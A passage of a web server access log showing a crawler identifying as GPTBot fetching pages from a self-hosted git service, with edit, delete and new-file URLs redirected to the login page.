+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" -[17/Feb/2026:19:18:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=nearduedate&state=open&type=all" -[17/Feb/2026:19:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10208] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&project=-1&sort=leastcomment&state=open&type=all" -[17/Feb/2026:19:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=leastupdate&state=closed&type=all" -[17/Feb/2026:19:18:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=open&type=all" -[17/Feb/2026:19:18:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11336] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:18:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11458] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11308] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 9860] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 10449] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 43] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:18:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:19:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=rendered" [Client 74.7.227.38] [Length 11307] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11460] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11402] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11840] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11210] [Gzip 3.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 1033] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10364] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:24 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:25 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 316] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 10436] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" [Client 74.7.227.38] [Length 91] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:19:18:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9911] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:19:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" [Client 74.7.227.38] [Length 955] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:19:18:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:30 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/progress.marks" -[17/Feb/2026:19:18:30 +0000] - 200 200 - GET https 